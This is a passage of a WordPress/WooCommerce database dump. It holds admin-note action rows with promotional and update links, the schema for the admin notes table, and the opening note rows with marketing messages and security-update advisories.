now','https://woocommerce.com/document/woocommerce-paypal-payments/?utm_source=inbox_note&utm_medium=product&utm_campaign=paypal_bnpl_au_promo_Q1_2025_button#pay-later-tab','unactioned',0,'',NULL,NULL),(83495,198,'stripe_stripetax_q1_2025_click','Automate my taxes with Stripe','https://woocommerce.com/products/stripe-tax/?utm_source=inbox_note&utm_medium=product&utm_campaign=stripe_stripetax_q1_2025_click','unactioned',0,'',NULL,NULL),(84174,199,'printful_promo_q1_2025','Get started for free','https://woocommerce.com/products/printful/?utm_source=inbox_note&utm_medium=product&utm_campaign=printful_promo_q1_2025','unactioned',0,'',NULL,NULL),(85880,201,'woo-marketplace-two-year-subscriptions-rin-2025-03-17','Browse the Marketplace','https://woocommerce.com/products/?utm_source=inbox_note&utm_medium=product&utm_campaign=woo-marketplace-two-year-subscriptions-rin-2025-03-17','actioned',0,'',NULL,NULL),(86997,203,'viva_wallet_migration_q1_2025_click','Get Viva.com Smart Checkout','https://woocommerce.com/it/products/viva-com-smart-for-woocommerce/?utm_source=inbox_note&utm_medium=product&utm_campaign=viva_wallet_migration_q1_2025_click','actioned',0,'',NULL,NULL),(88210,202,'stripe_nocapture_q2_2025_click','Update now','https://woocommerce.com/products/woocommerce-order-status-manager/?utm_source=inbox_note&utm_medium=product&utm_campaign=stripe_nocapture_q2_2025_click','unactioned',0,'',NULL,NULL),(88385,204,'WooCommerce-Stripe-Gateway-Update-April-2025','See available updates','https://gopalak.in/wp-admin/update-core.php?','actioned',0,'',NULL,NULL),(88386,205,'WooCommerce-Stripe-Gateway-Update-Info-April-2025','Dismiss','#','actioned',0,'',NULL,NULL),(90106,206,'klaviyo_q2_2025','Try Klaviyo today','https://woocommerce.com/products/klaviyo-for-woocommerce/?utm_source=inbox_note&utm_medium=product&utm_campaign=klaviyo_q2_2025','actioned',0,'',NULL,NULL),(90287,5,'wayflyer_bnpl_q4_2021','Level up with funding','https://woocommerce.com/products/wayflyer/?utm_source=inbox_note&utm_medium=product&utm_campaign=wayflyer_bnpl_q4_2021','actioned',0,'',NULL,NULL),(90288,6,'wc_shipping_mobile_app_usps_q4_2021','Get WooCommerce Shipping','https://woocommerce.com/woocommerce-shipping/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc_shipping_mobile_app_usps_q4_2021','actioned',0,'',NULL,NULL),(90289,12,'learn-more','Learn more','https://woocommerce.com/posts/ecommerce-shipping-solutions-guide/?utm_source=inbox_note&utm_medium=product&utm_campaign=learn-more','actioned',0,'',NULL,NULL),(90290,13,'optimizing-the-checkout-flow','Learn more','https://woocommerce.com/posts/optimizing-woocommerce-checkout?utm_source=inbox_note&utm_medium=product&utm_campaign=optimizing-the-checkout-flow','actioned',0,'',NULL,NULL),(90291,15,'qualitative-feedback-from-new-users','Share feedback','https://automattic.survey.fm/woopayments-new-user-feedback','actioned',0,'',NULL,NULL),(90292,16,'share-feedback','Share feedback','http://automattic.survey.fm/paypal-feedback','unactioned',0,'',NULL,NULL),(90293,17,'get-started','Get started','https://woocommerce.com/products/google-listings-and-ads?utm_source=inbox_note&utm_medium=product&utm_campaign=get-started','actioned',0,'',NULL,NULL),(90294,18,'update-wc-subscriptions-3-0-15','View latest version','https://gopalak.in/wp-admin/&page=wc-addons&section=helper','actioned',0,'',NULL,NULL),(90295,19,'update-wc-core-5-4-0','How to update WooCommerce','https://docs.woocommerce.com/document/how-to-update-woocommerce/','actioned',0,'',NULL,NULL),(90296,24,'ppxo-pps-install-paypal-payments-1','View upgrade guide','https://docs.woocommerce.com/document/woocommerce-paypal-payments/paypal-payments-upgrade-guide/','actioned',0,'',NULL,NULL),(90297,25,'ppxo-pps-install-paypal-payments-2','View upgrade guide','https://docs.woocommerce.com/document/woocommerce-paypal-payments/paypal-payments-upgrade-guide/','actioned',0,'',NULL,NULL),(90298,26,'learn-more','Learn more','https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/?utm_source=inbox_note&utm_medium=product&utm_campaign=learn-more','unactioned',0,'',NULL,NULL),(90299,26,'dismiss','Dismiss','','actioned',0,'',NULL,NULL),(90300,27,'learn-more','Learn more','https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/?utm_source=inbox_note&utm_medium=product&utm_campaign=learn-more','unactioned',0,'',NULL,NULL),(90301,27,'dismiss','Dismiss','','actioned',0,'',NULL,NULL),(90302,28,'learn-more','Learn more','https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/?utm_source=inbox_note&utm_medium=product&utm_campaign=learn-more','unactioned',0,'',NULL,NULL),(90303,28,'dismiss','Dismiss','','actioned',0,'',NULL,NULL),(90304,29,'learn-more','Learn more','https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/?utm_source=inbox_note&utm_medium=product&utm_campaign=learn-more','unactioned',0,'',NULL,NULL),(90305,29,'dismiss','Dismiss','','actioned',0,'',NULL,NULL),(90306,30,'share-feedback','Share feedback','https://automattic.survey.fm/store-management','unactioned',0,'',NULL,NULL),(90307,53,'learn-more','Learn more','https://developer.woocommerce.com/2022/03/10/woocommerce-3-5-10-6-3-1-security-releases/','unactioned',0,'',NULL,NULL),(90308,53,'woocommerce-core-paypal-march-2022-dismiss','Dismiss','','actioned',0,'',NULL,NULL),(90309,54,'learn-more','Learn more','https://developer.woocommerce.com/2022/03/10/woocommerce-3-5-10-6-3-1-security-releases/','unactioned',0,'',NULL,NULL),(90310,54,'dismiss','Dismiss','','actioned',0,'',NULL,NULL),(90311,56,'pinterest_03_2022_update','Update Instructions','https://woocommerce.com/document/pinterest-for-woocommerce/?utm_source=inbox_note&utm_medium=product&utm_campaign=pinterest_03_2022_update#section-3','actioned',0,'',NULL,NULL),(90312,57,'store_setup_survey_survey_q2_2022_share_your_thoughts','Tell us how it’s going','https://automattic.survey.fm/store-setup-survey-2022','actioned',0,'',NULL,NULL),(90313,80,'needs-update-eway-payment-gateway-rin-action-button-2022-12-20','See available updates','https://gopalak.in/wp-admin/update-core.php','unactioned',0,'',NULL,NULL),(90314,80,'needs-update-eway-payment-gateway-rin-dismiss-button-2022-12-20','Dismiss','#','actioned',0,'',NULL,NULL),(90315,81,'updated-eway-payment-gateway-rin-action-button-2022-12-20','See all updates','https://gopalak.in/wp-admin/update-core.php','unactioned',0,'',NULL,NULL),(90316,81,'updated-eway-payment-gateway-rin-dismiss-button-2022-12-20','Dismiss','#','actioned',0,'',NULL,NULL),(90317,83,'share-navigation-survey-feedback','Share feedback','https://automattic.survey.fm/new-ecommerce-plan-navigation','actioned',0,'',NULL,NULL),(90318,109,'woopay-beta-merchantrecruitment-activate-04MAY23','Activate WooPay','https://gopalak.in/wp-admin/admin.php?page=wc-settings&tab=checkout&section=woocommerce_payments&method=platform_checkout','actioned',0,'',NULL,NULL),(90319,109,'woopay-beta-merchantrecruitment-activate-learnmore-04MAY23','Learn More','https://woocommerce.com/woopay-businesses/?utm_source=inbox_note&utm_medium=product&utm_campaign=woopay-beta-merchantrecruitment-activate-learnmore-04MAY23','unactioned',0,'',NULL,NULL),(90320,88,'woocommerce-wcpay-march-2023-update-needed-button','See Blog Post','https://developer.woocommerce.com/2023/03/23/critical-vulnerability-detected-in-woocommerce-payments-what-you-need-to-know','unactioned',0,'',NULL,NULL),(90321,88,'woocommerce-wcpay-march-2023-update-needed-dismiss-button','Dismiss','#','actioned',0,'',NULL,NULL),(90322,89,'tap_to_pay_iphone_q2_2023_no_wcpay','Simplify my payments','https://woocommerce.com/products/woocommerce-payments/?utm_source=inbox_note&utm_medium=product&utm_campaign=tap_to_pay_iphone_q2_2023_no_wcpay','actioned',0,'',NULL,NULL),(90323,91,'extension-settings','See available updates','https://gopalak.in/wp-admin/update-core.php','unactioned',0,'',NULL,NULL),(90324,91,'dismiss','Dismiss','#','actioned',0,'',NULL,NULL),(90325,110,'woopay-beta-merchantrecruitment-update-WCPay-04MAY23','Update WooCommerce Payments','https://gopalak.in/wp-admin/plugins.php?plugin_status=all','unactioned',0,'',NULL,NULL),(90326,110,'woopay-beta-merchantrecruitment-update-activate-04MAY23','Activate WooPay','https://gopalak.in/wp-admin/admin.php?page=wc-settings&tab=checkout&section=woocommerce_payments&method=platform_checkout','actioned',0,'',NULL,NULL),(90327,105,'woopay-beta-existingmerchants-noaction-documentation-27APR23','Documentation','https://woocommerce.com/document/woopay-merchant-documentation/?utm_source=inbox_note&utm_medium=product&utm_campaign=woopay-beta-existingmerchants-noaction-documentation-27APR23','actioned',0,'',NULL,NULL),(90328,106,'woopay-beta-existingmerchants-update-WCPay-27APR23','Update WooCommerce Payments','https://gopalak.in/wp-admin/plugins.php?plugin_status=all','actioned',0,'',NULL,NULL),(90329,111,'woopay-beta-merchantrecruitment-short-activate-04MAY23','Activate WooPay','https://gopalak.in/wp-admin/admin.php?page=wc-settings&tab=checkout&section=woocommerce_payments&method=platform_checkout','actioned',0,'',NULL,NULL),(90330,111,'woopay-beta-merchantrecruitment-short-activate-learnmore-04MAY23','Learn More','https://woocommerce.com/woopay-businesses/?utm_source=inbox_note&utm_medium=product&utm_campaign=woopay-beta-merchantrecruitment-short-activate-learnmore-04MAY23','actioned',0,'',NULL,NULL),(90331,112,'woopay-beta-merchantrecruitment-short-update-WCPay-04MAY23','Update WooCommerce Payments','https://gopalak.in/wp-admin/plugins.php?plugin_status=all','unactioned',0,'',NULL,NULL),(90332,112,'woopay-beta-merchantrecruitment-short-update-activate-04MAY23','Activate WooPay','https://gopalak.in/wp-admin/admin.php?page=wc-settings&tab=checkout&section=woocommerce_payments&method=platform_checkout','actioned',0,'',NULL,NULL),(90333,113,'woopay-beta-merchantrecruitment-short-activate-06MAY23-TESTA','Activate WooPay Test A','https://gopalak.in/wp-admin/admin.php?page=wc-settings&tab=checkout&section=woocommerce_payments&method=platform_checkout','unactioned',0,'',NULL,NULL),(90334,113,'woopay-beta-merchantrecruitment-short-activate-learnmore-06MAY23-TESTA','Learn More','https://woocommerce.com/woopay-businesses/?utm_source=inbox_note&utm_medium=product&utm_campaign=woopay-beta-merchantrecruitment-short-activate-learnmore-06MAY23-TESTA','unactioned',0,'',NULL,NULL),(90335,114,'woopay-beta-merchantrecruitment-short-activate-06MAY23-TESTB','Activate WooPay Test B','https://gopalak.in/wp-admin/admin.php?page=wc-settings&tab=checkout&section=woocommerce_payments&method=platform_checkout','unactioned',0,'',NULL,NULL),(90336,114,'woopay-beta-merchantrecruitment-short-activate-learnmore-06MAY23-TESTA','Learn More','https://woocommerce.com/woopay-businesses/?utm_source=inbox_note&utm_medium=product&utm_campaign=woopay-beta-merchantrecruitment-short-activate-learnmore-06MAY23-TESTA','unactioned',0,'',NULL,NULL),(90337,115,'woopay-beta-merchantrecruitment-short-activate-06MAY23-TESTC','Activate WooPay Test C','https://gopalak.in/wp-admin/admin.php?page=wc-settings&tab=checkout&section=woocommerce_payments&method=platform_checkout','unactioned',0,'',NULL,NULL),(90338,115,'woopay-beta-merchantrecruitment-short-activate-learnmore-06MAY23-TESTC','Learn More','https://woocommerce.com/woopay-businesses/?utm_source=inbox_note&utm_medium=product&utm_campaign=woopay-beta-merchantrecruitment-short-activate-learnmore-06MAY23-TESTC','unactioned',0,'',NULL,NULL),(90339,116,'woopay-beta-merchantrecruitment-short-activate-06MAY23-TESTD','Activate WooPay Test D','https://gopalak.in/wp-admin/admin.php?page=wc-settings&tab=checkout&section=woocommerce_payments&method=platform_checkout','unactioned',0,'',NULL,NULL),(90340,116,'woopay-beta-merchantrecruitment-short-activate-learnmore-06MAY23-TESTD','Learn More','https://woocommerce.com/woopay-businesses/?utm_source=inbox_note&utm_medium=product&utm_campaign=woopay-beta-merchantrecruitment-short-activate-learnmore-06MAY23-TESTD','unactioned',0,'',NULL,NULL),(90341,117,'woopay-beta-merchantrecruitment-short-activate-button-09MAY23','Activate WooPay','https://gopalak.in/wp-admin/admin.php?page=wc-settings&tab=checkout&section=woocommerce_payments&method=platform_checkout','unactioned',0,'',NULL,NULL),(90342,117,'woopay-beta-merchantrecruitment-short-activate-learnmore-button2-09MAY23','Learn More','https://woocommerce.com/woopay-businesses/?utm_source=inbox_note&utm_medium=product&utm_campaign=woopay-beta-merchantrecruitment-short-activate-learnmore-button2-09MAY23','unactioned',0,'',NULL,NULL),(90343,118,'woopay-beta-merchantrecruitment-short-update-WCPay-09MAY23','Update WooCommerce Payments','https://gopalak.in/wp-admin/plugins.php?plugin_status=all','unactioned',0,'',NULL,NULL),(90344,118,'woopay-beta-merchantrecruitment-short-update-activate-09MAY23','Activate WooPay','https://gopalak.in/wp-admin/admin.php?page=wc-settings&tab=checkout&section=woocommerce_payments&method=platform_checkout','unactioned',0,'',NULL,NULL),(90345,125,'woocommerce-WCSubscriptions-June-2023-updated-needed-Plugin-Settings','See available updates','https://gopalak.in/wp-admin/plugins.php?plugin_status=all','unactioned',0,'',NULL,NULL),(90346,125,'woocommerce-WCSubscriptions-June-2023-updated-needed-dismiss','Dismiss','#','actioned',0,'',NULL,NULL),(90347,124,'woocommerce-WCReturnsWarranty-June-2023-updated-needed','See available updates','https://gopalak.in/wp-admin/plugins.php?plugin_status=all','unactioned',0,'',NULL,NULL),(90348,124,'woocommerce-WCReturnsWarranty-June-2023-updated-needed','Dismiss','#','actioned',0,'',NULL,NULL),(90349,128,'woocommerce-WCOPC-June-2023-updated-needed','See available updates','https://gopalak.in/wp-admin/plugins.php?plugin_status=all','actioned',0,'',NULL,NULL),(90350,128,'woocommerce-WCOPC-June-2023-updated-needed','Dismiss','https://gopalak.in/wp-admin/#','actioned',0,'',NULL,NULL),(90351,136,'woocommerce-WCGC-July-2023-update-needed','See available updates','https://gopalak.in/wp-admin/plugins.php?plugin_status=all','unactioned',0,'',NULL,NULL),(90352,136,'woocommerce-WCGC-July-2023-update-needed','Dismiss','#','actioned',0,'',NULL,NULL),(90353,137,'learn-more','Learn more','https://woocommerce.com/document/fedex/?utm_medium=product&utm_source=inbox_note&utm_campaign=learn-more#july-2023-api-outage','unactioned',0,'',NULL,NULL),(90354,138,'plugin-list','See available updates','https://gopalak.in/wp-admin/plugins.php?plugin_status=all','unactioned',0,'',NULL,NULL),(90355,138,'dismiss','Dismiss','https://gopalak.in/wp-admin/admin.php?page=wc-admin','actioned',0,'',NULL,NULL),(90356,141,'woocommerce-WCStripe-Aug-2023-update-needed','See available updates','https://gopalak.in/wp-admin/update-core.php?','unactioned',0,'',NULL,NULL),(90357,141,'dismiss','Dismiss','#','actioned',0,'',NULL,NULL),(90358,142,'dismiss','Dismiss','#','actioned',0,'',NULL,NULL),(90359,144,'dismiss','Dismiss','#','actioned',0,'',NULL,NULL),(90360,146,'avalara_q3-2023_noAvaTax','Automate my sales tax','https://woocommerce.com/products/woocommerce-avatax/?utm_source=inbox_note&utm_medium=product&utm_campaign=avalara_q3-2023_noAvaTax','unactioned',0,'',NULL,NULL),(90361,155,'woocommerce-usermeta-Sept2023-productvendors','See available updates','https://gopalak.in/wp-admin/plugins.php','unactioned',0,'',NULL,NULL),(90362,155,'dismiss','Dismiss','https://gopalak.in/wp-admin/#','actioned',0,'',NULL,NULL),(90363,160,'woocommerce-STRIPE-Oct-2023-update-needed','See available updates','https://gopalak.in/wp-admin/update-core.php','unactioned',0,'',NULL,NULL),(90364,160,'dismiss','Dismiss','#','actioned',0,'',NULL,NULL),(90365,166,'amazon-mcf-review-button-2023-12-07','Leave a review','https://woocommerce.com/products/woocommerce-amazon-fulfillment/?review&utm_source=inbox_note&utm_medium=product&utm_campaign=amazon-mcf-review-button-2023-12-07','actioned',0,'',NULL,NULL),(90366,166,'amazon-mcf-support-button-2023-12-07','Request support','https://woocommerce.com/my-account/contact-support/?utm_source=inbox_note&utm_medium=product&utm_campaign=amazon-mcf-support-button-2023-12-07','actioned',0,'',NULL,NULL),(90367,168,'view_docs','Learn about Deposit schedules','https://woocommerce.com/document/woopayments/deposits/deposit-schedule/?utm_source=inbox_note&utm_medium=product&utm_campaign=view_docs#available-funds','unactioned',0,'',NULL,NULL),(90368,190,'sirt-woo-2024-11-xss-admin','See available updates','https://gopalak.in/wp-admin/update-core.php?','unactioned',0,'',NULL,NULL),(90369,190,'sirt-woo-2024-11-xss-admin','Dismiss','#','actioned',0,'',NULL,NULL),(90370,194,'woocommerce-analytics-order-attribution-promotions-december-2024-find-out-more','Find out more','https://wordpress.org/plugins/woocommerce-analytics','actioned',0,'',NULL,NULL),(90371,200,'paypal-braintree-sdk-depreciation-2025-02-20-button','Upgrade now','https://gopalak.in/wp-admin/wp-admin/plugins.php','actioned',0,'',NULL,NULL),(90372,207,'uk-vat-notice-button-2025-04-30','Learn more about this extension','https://wordpress.org/plugins/eu-vat-for-woocommerce/','actioned',0,'',NULL,NULL),(90373,208,'payson-retirement-2025','Explore alternative payment methods','https://woocommerce.com/product-category/woocommerce-extensions/payment-gateways/?categoryIds=28680&collections=product&page=1&country=Sweden&utm_source=inbox_note&utm_medium=product&utm_campaign=payson-retirement-2025','actioned',0,'',NULL,NULL);
/*!40000 ALTER TABLE `wp_wc_admin_note_actions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_admin_notes`
--

DROP TABLE IF EXISTS `wp_wc_admin_notes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_admin_notes` (
  `note_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `type` varchar(20) NOT NULL,
  `locale` varchar(20) NOT NULL,
  `title` longtext NOT NULL,
  `content` longtext NOT NULL,
  `content_data` longtext DEFAULT NULL,
  `status` varchar(200) NOT NULL,
  `source` varchar(200) NOT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_reminder` datetime DEFAULT NULL,
  `is_snoozable` tinyint(1) NOT NULL DEFAULT 0,
  `layout` varchar(20) NOT NULL DEFAULT '',
  `image` varchar(200) DEFAULT NULL,
  `is_deleted` tinyint(1) NOT NULL DEFAULT 0,
  `is_read` tinyint(1) NOT NULL DEFAULT 0,
  `icon` varchar(200) NOT NULL DEFAULT 'info',
  PRIMARY KEY (`note_id`)
) ENGINE=InnoDB AUTO_INCREMENT=209 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_admin_notes`
--

LOCK TABLES `wp_wc_admin_notes` WRITE;
/*!40000 ALTER TABLE `wp_wc_admin_notes` DISABLE KEYS */;
INSERT INTO `wp_wc_admin_notes` VALUES (1,'stripe_applepay_holiday2021','marketing','en_US','Boost sales this holiday season with Apple Pay!','Increase your conversion rate by letting your customers know that you accept Apple Pay. It’s seamless to <a href=\"https://docs.woocommerce.com/document/stripe/?_ga=2.90941597.642705274.1635776464-1391993999.1621950839#apple-pay\">enable Apple Pay with Stripe</a> and easy to communicate it with this <a href=\"https://developer.apple.com/apple-pay/marketing/\">marketing guide</a>.','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(2,'square_applepay_holiday2021','marketing','en_US','Boost sales this holiday season with Apple Pay!','Increase your conversion rate by letting your customers know that you accept Apple Pay. It’s seamless to <a href=\"https://docs.woocommerce.com/document/woocommerce-square/?_ga=2.90941597.642705274.1635776464-1391993999.1621950839#section-14\">enable Apple Pay with Square</a> and easy to communicate it with this <a href=\"https://developer.apple.com/apple-pay/marketing/\">marketing guide</a>.','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(3,'wcpay_applepay_holiday2021','marketing','en_US','Boost sales this holiday season with Apple Pay!','Increase your conversion rate by letting your customers know that you accept Apple Pay. It’s seamless to <a href=\"https://docs.woocommerce.com/document/payments/apple-pay/\">enable Apple Pay with WooCommerce Payments</a> and easy to communicate it with this <a href=\"https://developer.apple.com/apple-pay/marketing/\">marketing guide</a>.','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(4,'new_in_app_marketplace_2021','info','en_US','Customize your store with extensions','Check out our NEW Extensions tab to see our favorite extensions for customizing your store, and discover the most popular extensions in the WooCommerce Marketplace.','{}','unactioned','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(5,'wayflyer_bnpl_q4_2021','marketing','en_US','Grow your business with funding through Wayflyer','Fast, flexible financing to boost cash flow and help your business grow – one fee, no interest rates, penalties, equity, or personal guarantees. Based on your store’s performance, Wayflyer provides funding and analytical insights to invest in your business.','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(6,'wc_shipping_mobile_app_usps_q4_2021','marketing','en_US','Print and manage your shipping labels with WooCommerce Shipping and the WooCommerce Mobile App','Save time by printing, purchasing, refunding, and tracking shipping labels generated by <a href=\"https://woocommerce.com/woocommerce-shipping/\">WooCommerce Shipping</a> – all directly from your mobile device!','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(7,'wc_shipping_mobile_app_q4_2021','marketing','en_US','Print and manage your shipping labels with the WooCommerce Mobile App','Save time by printing, purchasing, refunding, and tracking shipping labels generated by <a href=\"https://woocommerce.com/woocommerce-shipping/\">WooCommerce Shipping</a> – all directly from your mobile device!','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(8,'ecomm-need-help-setting-up-your-store','info','en_US','Need help setting up your Store?','Schedule a free 30-min <a href=\"https://wordpress.com/support/concierge-support/\">quick start session</a> and get help from our specialists. We’re happy to walk through setup steps, show you around the WordPress.com dashboard, troubleshoot any issues you may have, and help you the find the features you need to accomplish your goals for your site.','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(9,'woocommerce-services','info','en_US','WooCommerce Shipping & Tax','WooCommerce Shipping &amp; Tax helps get your store \"ready to sell\" as quickly as possible. You create your products. We take care of tax calculation, payment processing, and shipping label printing! Learn more about the extension that you just installed.','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(10,'ecomm-unique-shopping-experience','info','en_US','For a shopping experience as unique as your customers','Product Add-Ons allow your customers to personalize products while they\'re shopping on your online store. No more follow-up email requests—customers get what they want, before they\'re done checking out. Learn more about this extension that comes included in your plan.','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(11,'wc-admin-getting-started-in-ecommerce','info','en_US','Getting Started in eCommerce - webinar','We want to make eCommerce and this process of getting started as easy as possible for you. Watch this webinar to get tips on how to have our store up and running in a breeze.','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(12,'your-first-product','info','en_US','Your first product','That’s huge! You’re well on your way to building a successful online store — now it’s time to think about how you’ll fulfill your orders.<br /><br />Read our shipping guide to learn best practices and options for putting together your shipping strategy. And for WooCommerce stores in the United States, you can print discounted shipping labels via USPS with <a href=\"https://href.li/?https://woocommerce.com/shipping\" target=\"_blank\">WooCommerce Shipping</a>.','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(13,'wc-admin-optimizing-the-checkout-flow','info','en_US','Optimizing the checkout flow','It’s crucial to get your store’s checkout as smooth as possible to avoid losing sales. Let’s take a look at how you can optimize the checkout experience for your shoppers.','{}','unactioned','woocommerce.com','2022-01-27 07:43:30',NULL,0,'plain','',0,0,'info'),(14,'wc-admin-first-five-things-to-customize','info','en_US','The first 5 things to customize in your store','Deciding what to start with first is tricky. To help you properly prioritize, we’ve put together this short list of the first few things you should customize in WooCommerce.','{}','unactioned','woocommerce.com','2022-01-27 03:55:31',NULL,0,'plain','',0,0,'info'),(15,'wc-payments-qualitative-feedback','info','en_US','WooPayments setup - let us know what you think','Congrats on enabling WooPayments for your store. Please share your feedback in this 2 minute survey to help us improve the setup process.','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(16,'share-your-feedback-on-paypal','info','en_US','Share your feedback on PayPal','Share your feedback in this 2 minute survey about how we can make the process of accepting payments more useful for your store.','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(17,'google_listings_and_ads_install','marketing','en_US','Drive traffic and sales with Google','Reach online shoppers to drive traffic and sales for your store by showcasing products across Google, for free or with ads.','{}','unactioned','woocommerce.com','2022-03-07 07:15:43',NULL,0,'plain','',0,0,'info'),(18,'wc-subscriptions-security-update-3-0-15','info','en_US','WooCommerce Subscriptions security update!','We recently released an important security update to WooCommerce Subscriptions. To ensure your site’s data is protected, please upgrade <strong>WooCommerce Subscriptions to version 3.0.15</strong> or later.<br /><br />Click the button below to view and update to the latest Subscriptions version, or log in to <a href=\"https://woocommerce.com/my-dashboard\">WooCommerce.com Dashboard</a> and navigate to your <strong>Downloads</strong> page.<br /><br />We recommend always using the latest version of WooCommerce Subscriptions, and other software running on your site, to ensure maximum security.<br /><br />If you have any questions we are here to help — just <a href=\"https://woocommerce.com/my-account/create-a-ticket/\">open a ticket</a>.','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(19,'woocommerce-core-update-5-4-0','info','en_US','Update to WooCommerce 5.4.1 now','WooCommerce 5.4.1 addresses a checkout issue discovered in WooCommerce 5.4. We recommend upgrading to WooCommerce 5.4.1 as soon as possible.','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(20,'wcpay-promo-2020-11','marketing','en_US','wcpay-promo-2020-11','wcpay-promo-2020-11','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(21,'wcpay-promo-2020-12','marketing','en_US','wcpay-promo-2020-12','wcpay-promo-2020-12','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(22,'wcpay-promo-2021-6-incentive-1','marketing','en_US','Simplify the payments process for you and your customers with WooCommerce Payments','With <a href=\"https://woocommerce.com/payments/?utm_medium=notification&amp;utm_source=product&amp;utm_campaign=wcpay601\">WooCommerce Payments</a>, you can securely accept all major cards, Apple Pay®, and recurring revenue in over 100 currencies.\n				Built into your store’s WooCommerce dashboard, track cash flow and manage all of your transactions in one place – with no setup costs or monthly fees.\n				<br /><br />\n				By clicking \"Get WooCommerce Payments,\" you agree to the <a href=\"https://wordpress.com/tos/?utm_medium=notification&amp;utm_source=product&amp;utm_campaign=wcpay601\">Terms of Service</a>\n				and acknowledge you have read the <a href=\"https://automattic.com/privacy/\">Privacy Policy</a>.\n				','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(23,'wcpay-promo-2021-6-incentive-2','marketing','en_US','Simplify the payments process for you and your customers with WooCommerce Payments','With <a href=\"https://woocommerce.com/payments/?utm_medium=notification&amp;utm_source=product&amp;utm_campaign=wcpay601\">WooCommerce Payments</a>, you can securely accept all major cards, Apple Pay®, and recurring revenue in over 100 currencies.\n				Built into your store’s WooCommerce dashboard, track cash flow and manage all of your transactions in one place – with no setup costs or monthly fees.\n				<br /><br />\n				By clicking \"Get WooCommerce Payments,\" you agree to the <a href=\"https://wordpress.com/tos/?utm_medium=notification&amp;utm_source=product&amp;utm_campaign=wcpay601\">Terms of Service</a>\n				and acknowledge you have read the <a href=\"https://automattic.com/privacy/\">Privacy Policy</a>.\n				','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(24,'ppxo-pps-upgrade-paypal-payments-1','info','en_US','Get the latest PayPal extension for WooCommerce','Heads up! There’s a new PayPal on the block!<br /><br />Now is a great time to upgrade to our latest <a href=\"https://woocommerce.com/products/woocommerce-paypal-payments/\" target=\"_blank\">PayPal extension</a> to continue to receive support and updates with PayPal.<br /><br />Get access to a full suite of PayPal payment methods, extensive currency and country coverage, and pay later options with the all-new PayPal extension for WooCommerce.','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(25,'ppxo-pps-upgrade-paypal-payments-2','info','en_US','Upgrade your PayPal experience!','Get access to a full suite of PayPal payment methods, extensive currency and country coverage, offer subscription and recurring payments, and the new PayPal pay later options.<br /><br />Start using our <a href=\"https://woocommerce.com/products/woocommerce-paypal-payments/\" target=\"_blank\">latest PayPal today</a> to continue to receive support and updates.','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(26,'woocommerce-core-sqli-july-2021-need-to-update','update','en_US','Action required: Critical vulnerabilities in WooCommerce','In response to a critical vulnerability identified on July 13, 2021, we are working with the WordPress Plugins Team to deploy software updates to stores running WooCommerce (versions 3.3 to 5.5) and the WooCommerce Blocks feature plugin (versions 2.5 to 5.5).<br /><br />Our investigation into this vulnerability is ongoing, but <strong>we wanted to let you know now about the importance of updating immediately</strong>.<br /><br />For more information on which actions you should take, as well as answers to FAQs, please urgently review our blog post detailing this issue.','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(27,'woocommerce-blocks-sqli-july-2021-need-to-update','update','en_US','Action required: Critical vulnerabilities in WooCommerce Blocks','In response to a critical vulnerability identified on July 13, 2021, we are working with the WordPress Plugins Team to deploy software updates to stores running WooCommerce (versions 3.3 to 5.5) and the WooCommerce Blocks feature plugin (versions 2.5 to 5.5).<br /><br />Our investigation into this vulnerability is ongoing, but <strong>we wanted to let you know now about the importance of updating immediately</strong>.<br /><br />For more information on which actions you should take, as well as answers to FAQs, please urgently review our blog post detailing this issue.','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(28,'woocommerce-core-sqli-july-2021-store-patched','update','en_US','Solved: Critical vulnerabilities patched in WooCommerce','In response to a critical vulnerability identified on July 13, 2021, we worked with the WordPress 